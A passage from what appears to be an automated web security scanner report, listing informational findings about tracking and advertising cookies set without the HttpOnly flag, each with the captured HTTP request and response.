Set-Cookie: OAID=ecb9c74daa43b3484fade1b28358feac; expires=Tue, 08-May-2012 14:01:04 GMT; path=/
Set-Cookie: OAID=5fec8ad52d31f0a75384afd76f497365; expires=Tue, 08-May-2012 14:01:04 GMT; path=/
Set-Cookie: OAID=5c40cd21561f31b2e699ebc8f21d2201; expires=Tue, 08-May-2012 14:01:04 GMT; path=/
Set-Cookie: OAID=795b26de8dfcd1435cded22c800a6da1; expires=Tue, 08-May-2012 14:01:04 GMT; path=/
Set-Cookie: OAID=3d584d8018c288be22cc491f2c3d20c8; expires=Tue, 08-May-2012 14:01:04 GMT; path=/
Set-Cookie: OAID=edd769b48ec55499c645df3c48a7102b; expires=Tue, 08-May-2012 14:01:04 GMT; path=/
P3P: CP="CUR ADM OUR NOR STA NID"
Content-Size: 3664
Content-Length: 3664
Connection: close
Content-Type: application/x-javascript; charset=UTF-8

var OA_output = new Array();
OA_output['1'] = '';
OA_output['1'] += "<"+"a href=\'http://adserver.clashmusic.com/www/delivery/ck.php?oaparams=2__bannerid=857__zoneid=1__cb=3f6275af56__oadest=http://w
...[SNIP]...

10.27. http://alvenda.122.2o7.net/b/ss/alvendathomsonreuters/0/FAS-2.7-AS3/s88821683656424

Summary

Severity:   Information
Confidence:   Certain
Host:   http://alvenda.122.2o7.net
Path:   /b/ss/alvendathomsonreuters/0/FAS-2.7-AS3/s88821683656424

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/alvendathomsonreuters/0/FAS-2.7-AS3/s88821683656424?AQB=1&events=event4&c8=RubiconRemarketing_ThomsonReuters&c10=flash-expandable&c15=thomsonreuters&c12=rubicon&c13=www.thevine.com.au&c14=http%3A//www.thevine.com.au/music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx&v8=RubiconRemarketing_ThomsonReuters&v10=flash-expandable&v12=thomsonreuters&v18=rubicon&v16=www.thevine.com.au&v17=http%3A//www.thevine.com.au/music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx&AQE=1 HTTP/1.1
Host: alvenda.122.2o7.net
Proxy-Connection: keep-alive
Referer: http://www.thevine.com.au/music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_kbuchzx7Ex60bodah=[CS]v4|26D5B4CB05010768-40000100203F0C39|4DAB6981[CE]; s_vi_efmdyx7Fx7Cdyx7Fc=[CS]v4|26D9C884851603AF-6000017820228B75|4DB39107[CE]; s_vi_kaquvg=[CS]v4|26D9C88705163068-600001A62005EACD|4DB3910D[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|26DA3EC40516221C-6000018240050B56|4DB47D87[CE]; s_vi_fx7Bhjeljfd=[CS]v4|26DA3EC40516221C-6000018240050B58|4DB47D87[CE]; s_vi_kjodgjid=[CS]v4|26DB88E0051623F8-40000183606A19F8|4DB711BC[CE]; s_vi_bpx7Fubaxxx7Cbx7Dtdcacx7Eu=[CS]v4|26DCD8A2051D2CE1-4000010B601E36D8|4DB9B141[CE]; s_vi_zhgmzyx7Bfm=[CS]v4|26DCD88E051D2876-40000126E0042316|4DB9B141[CE]; s_vi_ftx7Bqfcx7Cqpzflx7Bqx7Cvtax7Czx7B=[CS]v4|26DCD8AD051D2DB9-6000010BE00A41AE|4DB9B152[CE]; s_vi_badex60xxcbdimh=[CS]v4|26DF53F605010C64-40000105C005564E|4DBEA7E9[CE]; s_vi_nyhylx7B88x3D=[CS]v4|26E3F9A98514A256-6000018C80238AC6|4DC7F352[CE]; s_vi_jcyonx7Eyjabola=[CS]v4|26E3F9A98514A256-6000018C80238AC8|4DC7F352[CE]

Response

HTTP/1.1 302 Found
Date: Mon, 09 May 2011 14:06:50 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_tycpx7Bqtax7Dzxxfzx7Bgpx60apgf=[CS]v4|0-0|4DC7F4FA[CE]; Expires=Sat, 7 May 2016 14:06:50 GMT; Domain=.2o7.net; Path=/
Location: http://alvenda.122.2o7.net/b/ss/alvendathomsonreuters/0/FAS-2.7-AS3/s88821683656424?AQB=1&pccr=true&&events=event4&c8=RubiconRemarketing_ThomsonReuters&c10=flash-expandable&c15=thomsonreuters&c12=rubicon&c13=www.thevine.com.au&c14=http%3A//www.thevine.com.au/music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx&v8=RubiconRemarketing_ThomsonReuters&v10=flash-expandable&v12=thomsonreuters&v18=rubicon&v16=www.thevine.com.au&v17=http%3A//www.thevine.com.au/music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx&AQE=1
X-C: ms-4.4.1
Expires: Sun, 08 May 2011 14:06:50 GMT
Last-Modified: Tue, 10 May 2011 14:06:50 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www290
Content-Length: 0
Content-Type: text/plain


10.28. http://api.twitter.com/1/statuses/user_timeline.json

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.twitter.com
Path:   /1/statuses/user_timeline.json

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /1/statuses/user_timeline.json?screen_name=OSentinelBiz&callback=TWTR.Widget.receiveCallback_1&include_rts=true&count=5&clientsource=TWITTERINC_WIDGET&1304949572397=cachebust HTTP/1.1
Host: api.twitter.com
Proxy-Connection: keep-alive
Referer: http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=130314166807091166; __utmz=43838368.1303561994.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); k=173.193.214.243.1304470443436909; __utma=43838368.551233229.1303561994.1304617828.1304721594.4

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 13:59:35 GMT
Server: hi
Status: 200 OK
X-Transaction: 1304949575-25240-22084
X-RateLimit-Limit: 150
ETag: "98aaceed48e4ccd42b79709e9f443154"-gzip
Last-Modified: Mon, 09 May 2011 13:59:35 GMT
X-RateLimit-Remaining: 148
X-Runtime: 0.02358
X-Transaction-Mask: a6183ffa5f8ca943ff1b53b5644ef114bc137096
Content-Type: application/json; charset=utf-8
Pragma: no-cache
X-RateLimit-Class: api
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: 4477c3eabd09e879d2fca4f211d0ecb1dcbd8643
X-RateLimit-Reset: 1304953175
Set-Cookie: original_referer=ZLhHHTiegr8aia0pL5vMr3kk%2BX%2BcqR3rsxppA%2FovyVCexTmcz%2FMvOkAXJR%2BHAK6zSrw43nllCDgN7RfPnnkGWrD0tlGHXcKgXzEfbM%2FnZyY2aQU3pk7AwQ%3D%3D; path=/
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCHpODtUvAToHaWQiJTRlZDg4ODBjZGUyYTBl%250ANDIwNTIwZGMzMTllNmI5N2M0IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--f79c0141fe922e790699a68ff50019e9d67d29da; domain=.twitter.com; path=/; HttpOnly
Vary: Accept-Encoding
Connection: close
Content-Length: 8808

TWTR.Widget.receiveCallback_1([{"text":"How local stations will cover #CaseyAnthony trial. http:\/\/bit.ly\/m7l2jo #media","coordinates":null,"truncated":false,"id_str":"67586194652930048","source":"w
...[SNIP]...

10.29. http://api.twitter.com/1/statuses/user_timeline.json

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.twitter.com
Path:   /1/statuses/user_timeline.json

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /1/statuses/user_timeline.json?screen_name=clash_music&callback=TWTR.Widget.receiveCallback_1&include_rts=true&count=3&clientsource=TWITTERINC_WIDGET&1304949966734=cachebust HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: api.twitter.com

Response

HTTP/1.0 400 Bad Request
Date: Mon, 09 May 2011 14:07:38 GMT
Server: hi
Status: 400 Bad Request
X-RateLimit-Limit: 150
X-RateLimit-Remaining: 0
X-Runtime: 0.00679
Content-Type: application/json; charset=utf-8
Content-Length: 306
X-RateLimit-Class: api
Cache-Control: no-cache, max-age=300
X-RateLimit-Reset: 1304953175
Set-Cookie: k=173.193.214.243.1304950057993657; path=/; expires=Mon, 16-May-11 14:07:37 GMT; domain=.twitter.com
Set-Cookie: guest_id=130495005799789295; path=/; expires=Wed, 08 Jun 2011 14:07:37 GMT
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCA6sFdUvAToHaWQiJTI1NzM4ZGNiNzM3ZmRj%250AMWYyNzZmY2FhM2E1MTViMmRiIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--46243618f4526801b6b817f75048101c30bc6cbc; domain=.twitter.com; path=/; HttpOnly
Expires: Mon, 09 May 2011 14:12:37 GMT
Connection: close

TWTR.Widget.receiveCallback_1({"request":"\/1\/statuses\/user_timeline.json?screen_name=clash_music&callback=TWTR.Widget.receiveCallback_1&include_rts=true&count=3&clientsource=TWITTERINC_WIDGET&13049
...[SNIP]...

10.30. http://ar.atwola.com/atd

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.atwola.com
Path:   /atd

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /atd HTTP/1.1
Host: ar.atwola.com
Proxy-Connection: keep-alive
Referer: http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cords=MToxMzA0NTU3MDI2OjcsMTMwNDU1NzAyNg==

Response

HTTP/1.1 302 Found
Date: Mon, 09 May 2011 13:59:55 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8l DAV/2
Expires: Mon, 09 May 2011 13:59:55 GMT
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="CURo DEVo TAIo PSAo IVAo IVDo LOC ONL UNI COM NAV INT STA DEM OUR"
Set-Cookie: cords=MToxMzA0OTQ5NTk1OjcsMTMwNDk0OTU5NQ==; domain=.ar.atwola.com; path=/; expires=Tue, 06 Sep 2011 13:59:55 GMT
Location: http://r.nexac.com/e/getdata.xgi?dt=br&pkey=jtkr94hrnfw22&ru=http://ar.atwola.com/atd?it=7%26iv=%3cna_di%3e%26ds%3d7%26ed%3d%3cna_da%3e%26rand=713403
Content-Length: 0
Content-Type: text/plain


10.31. http://ar.voicefive.com/b/wc_beacon.pli

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /b/wc_beacon.pli

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/wc_beacon.pli?n=BMX_G&d=0&v=method-%3E-1,ts-%3E1304949586.006,wait-%3E10000,&1304949587809 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p82806590=exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&; ar_p90452457=exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&; UID=875e3f1e-184.84.247.65-1303349046; ar_p97174789=exp=39&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 9 13:59:45 2011&prad=256163696&arc=206438267&; BMX_G=method->-1,ts->1304949585; BMX_3PC=1

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 09 May 2011 13:59:47 GMT
Content-Type: image/gif
Connection: close
Vary: Accept-Encoding
Set-Cookie: BMX_G=method%2D%3E%2D1%2Cts%2D%3E1304949586%2E006%2Cwait%2D%3E10000%2C; path=/; domain=.voicefive.com;
Content-length: 42
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent

GIF89a.............!.......,........@..D.;

10.32. http://ar.voicefive.com/bmx3/broker.pli

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=256163696&AR_C=206438267 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p82806590=exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&; ar_p90452457=exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&; ar_p97174789=exp=38&initExp=Sun Apr 24 12:09:48 2011&recExp=Sat May 7 18:10:30 2011&prad=253735207&arc=206438264&; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 09 May 2011 13:59:45 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=39&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 9 13:59:45 2011&prad=256163696&arc=206438267&; expires=Sun 07-Aug-2011 13:59:45 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1304949585; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25690

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"256163696",Pid:"p97174789",Arc:"206438267",Location:
...[SNIP]...

10.33. http://atd.agencytradingdesk.net/WatsonTracker/IMP/A1000138/C1000187/P1003016/pixel.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://atd.agencytradingdesk.net
Path:   /WatsonTracker/IMP/A1000138/C1000187/P1003016/pixel.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /WatsonTracker/IMP/A1000138/C1000187/P1003016/pixel.gif?address=http%3A//www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages&ref=&r=0.7856057139579207&TS=b2d804d6-adca-49fb-b367-cbdf1f8909e9&err= HTTP/1.1
Host: atd.agencytradingdesk.net
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:00:47 GMT
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: V=LsbDqh7rwFQu; expires=Wed, 09-May-2012 14:00:47 GMT; path=/
Set-Cookie: atd_event4=1000138|1000187|1003016||16|-1|-1|WI|5/9/2011 10:00:47 AM|6/8/2011 10:00:47 AM; expires=Wed, 08-Jun-2011 14:00:47 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: image/GIF
Content-Length: 42
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"

GIF89a.............!.......,........@..D.;

10.34. http://b.scorecardresearch.com/b

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /b

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=8&c2=2102&rn=699931416&c7=http%3A%2F%2Fwww.floridatoday.com%2Farticle%2F20110508%2FNEWS01%2F105080319%2FHighly-publicized-murder-Caylee-Anthony-rivets-enrages&c3=16&c4=0&c5=0&c15=541%252C1697%252C2354%252C2532%252C1443%252C2250&c16=LIFL1.FCRT1.ZETC1.AMQU2.NETM7.EXPD1&c8=Highly%20publicized%20murder%20of%20Caylee%20Anthony%20rivets%2C&cv=2.2&cs=js HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Mon, 09 May 2011 14:00:03 GMT
Connection: close
Set-Cookie: UID=25894b9d-24.143.206.177-1303083414; expires=Wed, 08-May-2013 14:00:03 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS


10.35. http://b.scorecardresearch.com/r

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /r

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r?c2=6036462&d.c=gif&d.o=tribglobal&d.x=64109300&d.t=page&d.u=http%3A%2F%2Fwww.orlandosentinel.com%2Fbusiness%2Fos-cfb-cover-casey-tv-20110509%2C0%2C6839926.story HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Date: Mon, 09 May 2011 13:59:57 GMT
Connection: close
Set-Cookie: UID=25894b9d-24.143.206.177-1303083414; expires=Wed, 08-May-2013 13:59:57 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

GIF89a.............!.......,...........D..;

10.36. http://b.voicefive.com/b

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.voicefive.com
Path:   /b

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=4&c2=p97174789&c3=256163696&c4=206438267&c5=1&c6=39&c7=sun%20apr%2024%2012%3A09%3A48%202011&c8=http%3A%2F%2Fwww.orlandosentinel.com%2Fbusiness%2Fos-cfb-cover-casey-tv-20110509%2C0%2C6839926.story&c9=&c10=http%3A%2F%2Fwww.orlandosentinel.com%2Fbusiness%2Fos-cfb-cover-casey-tv-20110509%2C0%2C6839926.story&c15=&1304949586804 HTTP/1.1
Host: b.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p82806590=exp=1&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu Apr 28 21:29:14 2011&prad=62872739&arc=40422016&; ar_p90452457=exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&; UID=875e3f1e-184.84.247.65-1303349046; ar_p97174789=exp=39&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 9 13:59:45 2011&prad=256163696&arc=206438267&; BMX_G=method->-1,ts->1304949585; BMX_3PC=1

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Mon, 09 May 2011 13:59:48 GMT
Connection: close
Set-Cookie: UID=875e3f1e-184.84.247.65-1303349046; expires=Wed, 08-May-2013 13:59:48 GMT; path=/; domain=.voicefive.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS


10.37. http://bandcamp.com/EmbeddedPlayer/album=1841946683/size=short/bgcol=FFFFFF/linkcol=4285BB//

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bandcamp.com
Path:   /EmbeddedPlayer/album=1841946683/size=short/bgcol=FFFFFF/linkcol=4285BB//

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /EmbeddedPlayer/album=1841946683/size=short/bgcol=FFFFFF/linkcol=4285BB// HTTP/1.1
Host: bandcamp.com
Proxy-Connection: keep-alive
Referer: http://asthmatickitty.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 303 See Other
Date: Mon, 09 May 2011 14:07:25 GMT
Location: http://bandcamp.com/tmpdata/cache/EmbeddedPlayer_d0e6d1752b89d4a0af444714f9fb047f.swf?size=short&album=1841946683&ref=http%3A%2F%2Fasthmatickitty.com%2F&linkcol=4285BB&bgcol=FFFFFF
Content-Type: text/html
Via: 1.1 bandcamp.com
Vary: Accept-Encoding
Set-Cookie: client_id=B19E03FF5E8534E71DA55EB294CAD1653B3E3289; domain=.bandcamp.com; path=/; expires=Sun, 09-May-2021 14:07:25 GMT
Connection: Keep-alive
Content-Length: 430

You are being redirected, please follow <a href="http://bandcamp.com/tmpdata/cache/EmbeddedPlayer_d0e6d1752b89d4a0af444714f9fb047f.swf?size=short&album=1841946683&ref=http%3A%2F%2Fasthmatickitty.com%2
...[SNIP]...

10.38. http://bandcamp.com/EmbeddedPlayer/v=2/album=3451972295/size=grande/bgcol=FFFFFF/linkcol=4285BB/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bandcamp.com
Path:   /EmbeddedPlayer/v=2/album=3451972295/size=grande/bgcol=FFFFFF/linkcol=4285BB/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /EmbeddedPlayer/v=2/album=3451972295/size=grande/bgcol=FFFFFF/linkcol=4285BB/ HTTP/1.1
Host: bandcamp.com
Proxy-Connection: keep-alive
